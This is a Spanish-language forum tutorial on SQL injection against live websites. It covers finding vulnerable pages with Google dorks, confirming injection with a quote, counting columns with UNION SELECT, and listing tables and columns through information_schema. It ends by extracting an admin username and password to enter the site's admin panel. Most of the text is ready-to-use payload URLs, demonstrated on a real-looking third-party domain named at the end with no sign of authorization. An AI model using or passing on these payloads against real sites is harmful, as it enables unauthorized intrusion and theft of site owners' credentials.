La inyeccion SQl consta de introducir un codigo SQL para librar consultas o para introducir datos.-
bueno vamos a comenzar
lo primero es encontrar un web vulnerable para eso puse el post de Dork en sql, buscamos con eso en San Google y para ver si una web es vulnerable borramos todo lo que sale a la derecha del dork en la direccion de la pagina q encontramos y ponemos una comilla simple (')
por ejemplo:
Código:
/products.php?catcode=11&catname=Bicycle%20Tube%20Valve
/products.php?catcode='
listo nos da un error con eso podemos hacer las consultas, primero vamos a ver en que columnas hacerlas para eso ponemos
/products.php?catcode=-1+UNION+SELECT+1
despues vamos agregando numeros al final separados por comas hasta que aparescan las columnas vulnerables
/products.php?catcode=-1+UNION+SELECT+1,2
/products.php?catcode=-1+UNION+SELECT+1,2,3
/products.php?catcode=-1+UNION+SELECT+1,2,3,4
/products.php?catcode=-1+UNION+SELECT+1,2,3,4,5
/products.php?catcode=-1+UNION+SELECT+1,2,3,4,5,6
/products.php?catcode=-1+UNION+SELECT+1,2,3,4,5,6,7
products.php?catcode=-1+UNION+SELECT+1,2,3,4,5,6,7,8
/products.php?catcode=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9
/products.php?catcode=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10
salio un numero, el 2, aveces salen mas o otros numeros, bueno con ese numero inyectaremos nuestro codigo en ese numero y al final de la columna
primero veremos los nombres de las tablas lo podemos hacer asi:
usaremos:
group_concat(table_name)
+from+information_schema.tables
entonces quedara
/products.php?catcode=-1+UNION+SELECT+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10+from+information_schema.tables
lo malo que cuando son muchas tablas con ese codigo no se ven todas entonces ocuparemos otro
group_concat(table_name)
+from+information_schema.tables+limit+20,1--
quedara:
/products.php?catcode=-1+UNION+SELECT+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+1,1--
E iremos cambiando el penultimo numero de la sentencia:
/products.php?catcode=-1+UNION+SELECT+1,group_concat(table_name),3,4,5,6, 7,8,9,10+from+information_schema.tables+limit+2,1--
/products.php?catcode=-1+UNION+SELECT+1,group_concat(table_name),3,4,5,6, 7,8,9,10+from+information_schema.tables+limit+3,1--
hasta encontrar columnas interesantes como usuarios, admin, tbluser, cosas asi, bueno con la primera inyeccion encontramos la tabla
admin
ahora queremos saber que contiene la admin para ello debemos pasarlo a ascii, quedara:
97,100,109,105,110
entonces pondremos otra inyeccion y utilizaremos:
group_concat(column_name)
+from+information_schema.columns+where+table_name= char(el codigo en ascii)
al final quedara
/products.php?catcode=-1+UNION+SELECT+1,group_concat(column_name),3,4,5,6 ,7,8,9,10+from+information_schema.columns+where+ta ble_name=char(97,100,109,105,110)
encontramos lo que tiene : username,password
entonces ahora queremos ver que tienen esas columnas entonces utilizaremos:
concat_ws(char(58),aqui ponemos lo q encontramos)
+from+la tabla que encontramos en este caso admin
quedara:
/products.php?catcode=-1+UNION+SELECT+1,group_concat(column_name),3,4,5,6 ,7,8,9,10+from+admin
error 0_0!
jaja no desesperen no todos dejan concatenar entonces hacemos esto
/products.php?catcode=-1+UNION+SELECT+1,username,3,4,5,6,7,8,9,10+from+admin
/products.php?catcode=-1+UNION+SELECT+1,password,3,4,5,6,7,8,9,10+from+admin
bueno ya tenemos el usuario admin y su password de esa web, bueno ese usario debe tener un login un panel en donde ponga su usuario y contraseña y debemos encontrarlo, en este caso:
/admin
Creo que Esta muy bien explicado posteare tambien algunos tutoriales mas dificiles
este tutorial esta echo sobre la web: h i n d u s t a n i m p e x . c o . i n